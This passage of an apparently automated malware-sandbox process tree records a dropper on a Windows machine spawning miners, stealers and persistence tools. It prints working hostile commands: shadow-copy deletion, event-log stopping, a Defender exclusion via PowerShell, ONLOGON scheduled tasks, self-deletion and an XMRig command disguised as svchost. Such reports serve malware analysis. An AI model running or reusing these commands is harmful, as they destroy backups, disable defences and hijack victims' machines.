    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop eventlog
        5⤵
        Launches sc.exe
        
        PID:1324
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:5948
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe start "GeekBrains"
        5⤵
        Launches sc.exe
        
        PID:2824
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:5956
  - - C:\Users\Admin\Desktop\a\gem1.exe
      "C:\Users\Admin\Desktop\a\gem1.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      System Location Discovery: System Language Discovery
      PID:3808
    - - C:\Users\Admin\Desktop\a\gem1.exe
        
        "C:\Users\Admin\Desktop\a\gem1.exe"
        5⤵
        Checks computer location settings
        Executes dropped EXE
        Accesses Microsoft Outlook profiles
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        outlook_office_path
        outlook_win_path
        
        PID:3240
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3808 -s 140
        5⤵
        Program crash
        
        PID:5148
  - - C:\Users\Admin\Desktop\a\123.exe
      "C:\Users\Admin\Desktop\a\123.exe"
      4⤵
      PID:3528
  - - C:\Users\Admin\Desktop\a\xmrig.exe
      "C:\Users\Admin\Desktop\a\xmrig.exe"
      4⤵
      PID:7180
  - - C:\Users\Admin\Desktop\a\RuntimeBroker.exe
      "C:\Users\Admin\Desktop\a\RuntimeBroker.exe"
      4⤵
      PID:7704
    - - C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "RuntimeBroker" /sc ONLOGON /tr "C:\Windows\system32\a7\RuntimeBroker.exe" /rl HIGHEST /f
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:7796
    - - C:\Windows\system32\a7\RuntimeBroker.exe
        
        "C:\Windows\system32\a7\RuntimeBroker.exe"
        5⤵
        
        PID:7956
      - C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "RuntimeBroker" /sc ONLOGON /tr "C:\Windows\system32\a7\RuntimeBroker.exe" /rl HIGHEST /f
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:8120
  - - C:\Users\Admin\Desktop\a\Crawl.exe
      "C:\Users\Admin\Desktop\a\Crawl.exe"
      4⤵
      PID:7540
    - - \??\c:\Windows\system32\wbem\wmic.exe
        
        c:\JHdIVt\JHdI\..\..\Windows\JHdI\JHdI\..\..\system32\JHdI\JHdI\..\..\wbem\JHdI\JHdIV\..\..\wmic.exe shadowcopy delete
        5⤵
        
        PID:1180
    - - \??\c:\Windows\system32\wbem\wmic.exe
        
        c:\xwJKuU\xwJK\..\..\Windows\xwJK\xwJK\..\..\system32\xwJK\xwJK\..\..\wbem\xwJK\xwJKu\..\..\wmic.exe shadowcopy delete
        5⤵
        
        PID:2724
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\Desktop\a\Crawl.exe"
        5⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:8504
      - C:\Windows\SysWOW64\PING.EXE
        
        ping 1.1.1.1 -n 1 -w 3000
        6⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:6988
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6988 -s 344
        7⤵
        Program crash
        
        PID:4900
- - C:\ProgramData\Synaptics\Synaptics.exe
    "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    PID:1668
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe"
  2⤵
  - Drops file in Windows directory
  - Enumerates system info in registry
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of WriteProcessMemory
  PID:468
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x7ffc6440cc40,0x7ffc6440cc4c,0x7ffc6440cc58
    3⤵
    PID:3556
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1936,i,15595966034426380271,3123824761465129811,262144 --variations-seed-version=20250112-180253.846000 --mojo-platform-channel-handle=1932 /prefetch:2
    3⤵
    PID:1212
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2164,i,15595966034426380271,3123824761465129811,262144 --variations-seed-version=20250112-180253.846000 --mojo-platform-channel-handle=2224 /prefetch:3
    3⤵
    PID:4400
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2260,i,15595966034426380271,3123824761465129811,262144 --variations-seed-version=20250112-180253.846000 --mojo-platform-channel-handle=2468 /prefetch:8
    3⤵
    PID:4664
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3148,i,15595966034426380271,3123824761465129811,262144 --variations-seed-version=20250112-180253.846000 --mojo-platform-channel-handle=3192 /prefetch:1
    3⤵
    PID:4000
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3156,i,15595966034426380271,3123824761465129811,262144 --variations-seed-version=20250112-180253.846000 --mojo-platform-channel-handle=3220 /prefetch:1
    3⤵
    PID:4420
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4520,i,15595966034426380271,3123824761465129811,262144 --variations-seed-version=20250112-180253.846000 --mojo-platform-channel-handle=4556 /prefetch:1
    3⤵
    PID:4344
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4836,i,15595966034426380271,3123824761465129811,262144 --variations-seed-version=20250112-180253.846000 --mojo-platform-channel-handle=4888 /prefetch:8
    3⤵
    PID:652
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4684,i,15595966034426380271,3123824761465129811,262144 --variations-seed-version=20250112-180253.846000 --mojo-platform-channel-handle=4928 /prefetch:8
    3⤵
    PID:4824
- - C:\Program Files\Google\Chrome\Application\123.0.6312.123\Installer\setup.exe
    "C:\Program Files\Google\Chrome\Application\123.0.6312.123\Installer\setup.exe" --reenable-autoupdates --system-level
    3⤵
    - Drops file in Windows directory
    PID:3108
  - - C:\Program Files\Google\Chrome\Application\123.0.6312.123\Installer\setup.exe
      "C:\Program Files\Google\Chrome\Application\123.0.6312.123\Installer\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\SystemTemp\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x298,0x29c,0x2a0,0x274,0x2a4,0x7ff69a2f4698,0x7ff69a2f46a4,0x7ff69a2f46b0
      4⤵
      Drops file in Windows directory
      PID:4836
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --field-trial-handle=4680,i,15595966034426380271,3123824761465129811,262144 --variations-seed-version=20250112-180253.846000 --mojo-platform-channel-handle=4572 /prefetch:1
    3⤵
    PID:4980
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe"
  2⤵
  PID:2720
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe"
    3⤵
    - Checks processor information in registry
    - Modifies registry class
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    - Suspicious use of SetWindowsHookEx
    PID:4652
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1972 -parentBuildID 20240401114208 -prefsHandle 1888 -prefMapHandle 1880 -prefsLen 27137 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {c99d922c-5506-455b-8378-b805270f4ce8} 4652 "\\.\pipe\gecko-crash-server-pipe.4652" gpu
      4⤵
      PID:1172
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2380 -parentBuildID 20240401114208 -prefsHandle 2356 -prefMapHandle 2352 -prefsLen 27015 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6b4ec2e5-dd69-4810-98e1-fe96d768e6d7} 4652 "\\.\pipe\gecko-crash-server-pipe.4652" socket
      4⤵
      PID:3216
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2992 -childID 1 -isForBrowser -prefsHandle 2996 -prefMapHandle 2984 -prefsLen 22698 -prefMapSize 244658 -jsInitHandle 1140 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c3dff183-244b-454f-be2d-9815d0d9dcdd} 4652 "\\.\pipe\gecko-crash-server-pipe.4652" tab
      4⤵
      PID:1936
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3916 -childID 2 -isForBrowser -prefsHandle 3988 -prefMapHandle 3984 -prefsLen 32389 -prefMapSize 244658 -jsInitHandle 1140 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {85c68065-e520-4a3e-a7d5-e171f090fb28} 4652 "\\.\pipe\gecko-crash-server-pipe.4652" tab
      4⤵
      PID:1804
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4764 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4768 -prefMapHandle 4756 -prefsLen 32389 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {59269b1b-ee45-47b3-a0e2-1dd946eb5bea} 4652 "\\.\pipe\gecko-crash-server-pipe.4652" utility
      4⤵
      Checks processor information in registry
      PID:5140
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5380 -childID 3 -isForBrowser -prefsHandle 5372 -prefMapHandle 5360 -prefsLen 27097 -prefMapSize 244658 -jsInitHandle 1140 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {485092b5-67bf-42ae-be1e-592ee83e32b3} 4652 "\\.\pipe\gecko-crash-server-pipe.4652" tab
      4⤵
      PID:5856
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5344 -childID 4 -isForBrowser -prefsHandle 5536 -prefMapHandle 5544 -prefsLen 27097 -prefMapSize 244658 -jsInitHandle 1140 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b9791e95-0aab-4bf4-b8d5-d1895ac0e072} 4652 "\\.\pipe\gecko-crash-server-pipe.4652" tab
      4⤵
      PID:5868
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5744 -childID 5 -isForBrowser -prefsHandle 5664 -prefMapHandle 5668 -prefsLen 27097 -prefMapSize 244658 -jsInitHandle 1140 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {39a2f2f7-f40f-4380-8816-f0a66759211b} 4652 "\\.\pipe\gecko-crash-server-pipe.4652" tab
      4⤵
      PID:5884
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6236 -childID 6 -isForBrowser -prefsHandle 6240 -prefMapHandle 6232 -prefsLen 27176 -prefMapSize 244658 -jsInitHandle 1140 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {392af652-7570-4243-b0fb-bb81b0dc8cfc} 4652 "\\.\pipe\gecko-crash-server-pipe.4652" tab
      4⤵
      PID:1468
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5104 -childID 7 -isForBrowser -prefsHandle 6632 -prefMapHandle 6636 -prefsLen 27226 -prefMapSize 244658 -jsInitHandle 1140 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9a5e0ff6-4efc-4be0-ae3b-982f6ba85391} 4652 "\\.\pipe\gecko-crash-server-pipe.4652" tab
      4⤵
      PID:5812
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4148 -parentBuildID 20240401114208 -prefsHandle 4276 -prefMapHandle 4272 -prefsLen 32419 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {10939f37-71a4-439a-9075-6d1178f7a842} 4652 "\\.\pipe\gecko-crash-server-pipe.4652" rdd
      4⤵
      PID:6000
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4284 -parentBuildID 20240401114208 -sandboxingKind 1 -prefsHandle 3664 -prefMapHandle 3660 -prefsLen 32419 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {dbd10c5f-0c83-4bf4-8859-b212d50e011e} 4652 "\\.\pipe\gecko-crash-server-pipe.4652" utility
      4⤵
      Checks processor information in registry
      PID:6092
  - - C:\Users\Admin\Desktop\New Text Document mod.exe
      "C:\Users\Admin\Desktop\New Text Document mod.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      Modifies registry class
      PID:6048
    - - C:\Users\Admin\Desktop\._cache_New Text Document mod.exe
        
        "C:\Users\Admin\Desktop\._cache_New Text Document mod.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:388
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:4252
      - C:\Users\Admin\Desktop\a\albt.exe
        
        "C:\Users\Admin\Desktop\a\albt.exe"
        6⤵
        
        PID:8008
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 8008 -s 728
        7⤵
        Program crash
        
        PID:9140
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 8008 -s 476
        7⤵
        Program crash
        
        PID:9084
      - C:\Users\Admin\Desktop\a\drop1.exe
        
        "C:\Users\Admin\Desktop\a\drop1.exe"
        6⤵
        
        PID:8408
        
        C:\Users\Admin\Desktop\a\drop1.exe
        
        "C:\Users\Admin\Desktop\a\drop1.exe"
        7⤵
        
        PID:9080
      - C:\Users\Admin\Desktop\a\sdggwsdgdrwgrwgrwgrwgrw.exe
        
        "C:\Users\Admin\Desktop\a\sdggwsdgdrwgrwgrwgrwgrw.exe"
        6⤵
        
        PID:7720
  - - C:\Users\Admin\Desktop\New Text Document mod.exe
      "C:\Users\Admin\Desktop\New Text Document mod.exe"
      4⤵
      PID:4860
    - - C:\Users\Admin\Desktop\._cache_New Text Document mod.exe
        
        "C:\Users\Admin\Desktop\._cache_New Text Document mod.exe"
        5⤵
        
        PID:2468
      - C:\Users\Admin\Desktop\a\64.exe
        
        "C:\Users\Admin\Desktop\a\64.exe"
        6⤵
        
        PID:5464
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c color 0a
        7⤵
        
        PID:280
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c chcp 936
        7⤵
        
        PID:3404
        
        C:\Windows\system32\chcp.com
        
        chcp 936
        8⤵
        
        PID:568
- C:\Users\Admin\Desktop\New Text Document mod.exe
  "C:\Users\Admin\Desktop\New Text Document mod.exe"
  2⤵
  PID:6980
- - C:\Users\Admin\Desktop\._cache_New Text Document mod.exe
    "C:\Users\Admin\Desktop\._cache_New Text Document mod.exe"
    3⤵
    PID:7028
  - - C:\Users\Admin\Desktop\a\svhost.exe
      "C:\Users\Admin\Desktop\a\svhost.exe"
      4⤵
      PID:2392
  - - C:\Users\Admin\Desktop\a\chrtrome22.exe
      "C:\Users\Admin\Desktop\a\chrtrome22.exe"
      4⤵
      PID:6916
    - - C:\xmrig\xmrig-6.22.2\xmrig.exe
        
        "C:\xmrig\xmrig-6.22.2\xmrig.exe" --config=C:\xmrig\xmrig-6.22.2\config.json
        5⤵
        
        PID:5160
  - - C:\Users\Admin\Desktop\a\Fixer.exe
      "C:\Users\Admin\Desktop\a\Fixer.exe"
      4⤵
      PID:960
  - - C:\Users\Admin\Desktop\a\Steanings.exe
      "C:\Users\Admin\Desktop\a\Steanings.exe"
      4⤵
      PID:7300
  - - C:\Users\Admin\Desktop\a\AsyncClientGK.exe
      "C:\Users\Admin\Desktop\a\AsyncClientGK.exe"
      4⤵
      PID:7480
- C:\Users\Admin\Desktop\New Text Document mod.exe
  "C:\Users\Admin\Desktop\New Text Document mod.exe"
  2⤵
  PID:4132
- - C:\Users\Admin\Desktop\._cache_New Text Document mod.exe
    "C:\Users\Admin\Desktop\._cache_New Text Document mod.exe"
    3⤵
    PID:5628
- C:\Users\Admin\Desktop\New Text Document mod.exe
  "C:\Users\Admin\Desktop\New Text Document mod.exe"
  2⤵
  PID:5308
- - C:\Users\Admin\Desktop\._cache_New Text Document mod.exe
    "C:\Users\Admin\Desktop\._cache_New Text Document mod.exe"
    3⤵
    PID:1504
- C:\Users\Admin\Desktop\New Text Document mod.exe
  "C:\Users\Admin\Desktop\New Text Document mod.exe"
  2⤵
  PID:1196
- - C:\Users\Admin\Desktop\._cache_New Text Document mod.exe
    "C:\Users\Admin\Desktop\._cache_New Text Document mod.exe"
    3⤵
    PID:6420
  - - C:\Users\Admin\Desktop\a\uu.exe
      "C:\Users\Admin\Desktop\a\uu.exe"
      4⤵
      PID:8076
  - - C:\Users\Admin\Desktop\a\Crawl.exe
      "C:\Users\Admin\Desktop\a\Crawl.exe"
      4⤵
      PID:7264
    - - \??\c:\Windows\system32\wbem\wmic.exe
        
        c:\ZtgEnu\ZtgE\..\..\Windows\ZtgE\ZtgE\..\..\system32\ZtgE\ZtgE\..\..\wbem\ZtgE\ZtgEn\..\..\wmic.exe shadowcopy delete
        5⤵
        
        PID:8204
    - - \??\c:\Windows\system32\wbem\wmic.exe
        
        c:\uJhWbv\uJhW\..\..\Windows\uJhW\uJhW\..\..\system32\uJhW\uJhW\..\..\wbem\uJhW\uJhWb\..\..\wmic.exe shadowcopy delete
        5⤵
        
        PID:9176
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\Desktop\a\Crawl.exe"
        5⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:4932
      - C:\Windows\SysWOW64\PING.EXE
        
        ping 1.1.1.1 -n 1 -w 3000
        6⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:2516
  - - C:\Users\Admin\Desktop\a\sela.exe
      "C:\Users\Admin\Desktop\a\sela.exe"
      4⤵
      PID:7968
  - - C:\Users\Admin\Desktop\a\JJSPLOIT.V2.exe
      "C:\Users\Admin\Desktop\a\JJSPLOIT.V2.exe"
      4⤵
      PID:8056
    - - C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "windows background updater" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\windows updater\windows 3543.exe" /rl HIGHEST /f
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:6568
    - - C:\Users\Admin\AppData\Roaming\windows updater\windows 3543.exe
        
        "C:\Users\Admin\AppData\Roaming\windows updater\windows 3543.exe"
        5⤵
        
        PID:7952
      - C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "windows background updater" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\windows updater\windows 3543.exe" /rl HIGHEST /f
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:9188
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\rwsY5aFhRhew.bat" "
        6⤵
        
        PID:1616
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        7⤵
        
        PID:7316
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        7⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:5600
        
        C:\Users\Admin\AppData\Roaming\windows updater\windows 3543.exe
        
        "C:\Users\Admin\AppData\Roaming\windows updater\windows 3543.exe"
        7⤵
        
        PID:8600
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "windows background updater" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\windows updater\windows 3543.exe" /rl HIGHEST /f
        8⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:7588
  - - C:\Users\Admin\Desktop\a\drop2.exe
      "C:\Users\Admin\Desktop\a\drop2.exe"
      4⤵
      PID:5684
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -Command "Add-MpPreference -ExclusionExtension '.exe'; Add-MpPreference -ExclusionProcess 'svchost.exe'"
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6868
    - - C:\Windows\SYSTEM32\SCHTASKS.exe
        
        SCHTASKS /CREATE /TN "System-f4855f59e0" /TR "C:\Windows\System32\System-f4855f59e0.exe" /SC ONLOGON /RL HIGHEST /F
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3184
    - - C:\Windows\System32\svchost.exe
        
        C:\Windows\System32\svchost.exe
        5⤵
        
        PID:8276
      - C:\Windows\System32\powercfg.exe
        
        powercfg -change standby-timeout-ac 0
        6⤵
        Power Settings
        
        PID:7864
      - C:\Windows\System32\powercfg.exe
        
        powercfg -change monitor-timeout-ac 0
        6⤵
        Power Settings
        
        PID:7868
      - C:\Windows\System32\powercfg.exe
        
        powercfg /setacvalueindex SCHEME_CURRENT SUB_BUTTONS LIDACTION 0
        6⤵
        Power Settings
        
        PID:7764
      - C:\Windows\System32\powercfg.exe
        
        powercfg /setactive SCHEME_CURRENT
        6⤵
        Power Settings
        
        PID:7700
      - C:\Windows\System32\Wbem\wmic.exe
        
        wmic diskdrive get serialnumber
        6⤵
        
        PID:7516
      - C:\Windows\System32\Wbem\wmic.exe
        
        wmic diskdrive get serialnumber
        6⤵
        
        PID:3376
      - C:\Windows\System32\curl.exe
        
        curl -s https://api.ipify.org
        6⤵
        
        PID:5436
      - C:\Windows\System32\Wbem\wmic.exe
        
        wmic diskdrive get serialnumber
        6⤵
        
        PID:2504
      - C:\Windows\System32\curl.exe
        
        curl -s http://ipinfo.io/country
        6⤵
        
        PID:1172
      - C:\Windows\System32\svchost.exe
        
        "C:\Windows\System32\svchost.exe" --algo rx/0 --url pool.supportxmr.com:8080 --user 46M39DM1DQjFKUnT3t2KiHNU6qQjmRF79J31fSbtBNafUX9B2gAwysjLFADQ5mhqR4M6C8JJRFXwLPxDHapuCrHE3mRBjTw/lunarig --cpu-max-threads-hint=30
        6⤵
        
        PID:8968
    - - C:\Windows\SysWOW64\explorer.exe
        
        "C:\Windows\SysWOW64\explorer.exe"
        5⤵
        
        PID:9176
    - - C:\Windows\SysWOW64\explorer.exe
        
        "C:\Windows\SysWOW64\explorer.exe"
        5⤵
        
        PID:1544
  - - C:\Users\Admin\Desktop\a\wudi.exe
      "C:\Users\Admin\Desktop\a\wudi.exe"
      4⤵
      PID:7268
- C:\Users\Admin\Desktop\New Text Document mod.exe
  "C:\Users\Admin\Desktop\New Text Document mod.exe"
  2⤵
  PID:5564
- - C:\Users\Admin\Desktop\._cache_New Text Document mod.exe
    "C:\Users\Admin\Desktop\._cache_New Text Document mod.exe"
    3⤵
    PID:5256
- C:\Users\Admin\Desktop\New Text Document mod.exe
  "C:\Users\Admin\Desktop\New Text Document mod.exe"
  2⤵
  PID:1292
- - C:\Users\Admin\Desktop\._cache_New Text Document mod.exe
    "C:\Users\Admin\Desktop\._cache_New Text Document mod.exe"
    3⤵
    PID:6464
  - - C:\Users\Admin\Desktop\a\Crawl.exe
      "C:\Users\Admin\Desktop\a\Crawl.exe"
      4⤵
      PID:3444
  - - C:\Users\Admin\Desktop\a\BootstrapperNew.exe
      "C:\Users\Admin\Desktop\a\BootstrapperNew.exe"
      4⤵
      PID:1256
- C:\Users\Admin\Desktop\New Text Document mod.exe
  "C:\Users\Admin\Desktop\New Text Document mod.exe"
  2⤵
  PID:6836
- - C:\Users\Admin\Desktop\._cache_New Text Document mod.exe
    "C:\Users\Admin\Desktop\._cache_New Text Document mod.exe"
    3⤵
    PID:692
- C:\Users\Admin\Desktop\New Text Document mod.exe
  "C:\Users\Admin\Desktop\New Text Document mod.exe"
  2⤵
  PID:6900
- - C:\Users\Admin\Desktop\._cache_New Text Document mod.exe
    "C:\Users\Admin\Desktop\._cache_New Text Document mod.exe"
    3⤵
    PID:7128
  - - C:\Users\Admin\Desktop\a\01.exe
      "C:\Users\Admin\Desktop\a\01.exe"
      4⤵
      PID:9016
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 9016 -s 384
        5⤵
        Program crash
        
        PID:8592
  - - C:\Users\Admin\Desktop\a\00.exe
      "C:\Users\Admin\Desktop\a\00.exe"
      4⤵
      PID:8412
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 8412 -s 396
        5⤵
        Program crash
        
        PID:4548
  - - C:\Users\Admin\Desktop\a\02.exe
      "C:\Users\Admin\Desktop\a\02.exe"
      4⤵
      PID:8640
    - - C:\Users\Admin\Desktop\a\._cache_02.exe
        
        "C:\Users\Admin\Desktop\a\._cache_02.exe"
        5⤵
        
        PID:8568
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 8568 -s 400
        6⤵
        Program crash
        
        PID:8056
  - - C:\Users\Admin\Desktop\a\IMG001.exe
      "C:\Users\Admin\Desktop\a\IMG001.exe"
      4⤵
      PID:776
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c taskkill /f /im tftp.exe & tskill tftp.exe
        5⤵
        
        PID:4932
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im tftp.exe
        6⤵
        Kills process with taskkill
        
        PID:3444
    - - C:\Users\Admin\AppData\Local\Temp\tftp.exe
        
